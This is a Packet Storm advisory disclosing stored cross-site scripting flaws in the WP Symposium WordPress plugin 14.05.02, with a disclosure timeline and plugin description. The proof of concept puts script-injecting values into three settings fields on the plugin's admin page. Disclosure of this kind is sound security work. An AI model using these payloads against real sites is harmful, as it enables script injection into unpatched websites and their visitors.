WordPress Symposium 14.05.02 Cross Site Scripting

2015-12-17T00:00:00
ID PACKETSTORM:134884
Type packetstorm
Reporter Madhu Akula
Modified 2015-12-17T00:00:00

Description

                                        
                                            `Plugin Name : WP Symposium  
  
Effected Version : 14.05.02 (and most probably lower version's if any)  
  
Vulnerability : A3-Cross-Site Scripting (XSS)  
  
Identified by : Madhu Akula  
  
  
  
Technical Details  
  
Minimum Level of Access Required : Unauthenticated  
  
PoC - (Proof of Concept) :  
  
The following fields put the payload as below  
  
http://localhost/wp-admin/admin.php?page=symposium_settings.php  
  
wps_time_out = “><script>alert(1)</script>  
  
wps_js_file = “><script>alert(2)</script>  
  
img_path = “><script>alert(3)</script>  
  
  
  
Video Demonstration:  
  
http://www.youtube.com/watch?v=_T_2-s2AMY0  
  
Impact : Multiple Cross Site Scripting vulnerabilities  
  
Fixed in : No update  
  
  
Disclosure Timeline  
  
Vendor Contacted : 2014-08-01  
  
Plugin Status : No Change on 2014-08-02  
  
Public Disclosure : October 3, 2015  
  
CVE Number : Not assigned yet  
  
Plugin Description :  
  
WP Symposium turns a WordPress website into a Social Network! It is a WordPress plugin that provides a forum, activity (similar to Facebook wall), member directory, private mail, notification panel, chat windows, profile page, social widgets, activity alerts, RSS activity feeds, Groups, Events, Gallery, Facebook Connect and Mobile support! You simply choose which you want to activate! Certain features are optional to members to protect their privacy.  
`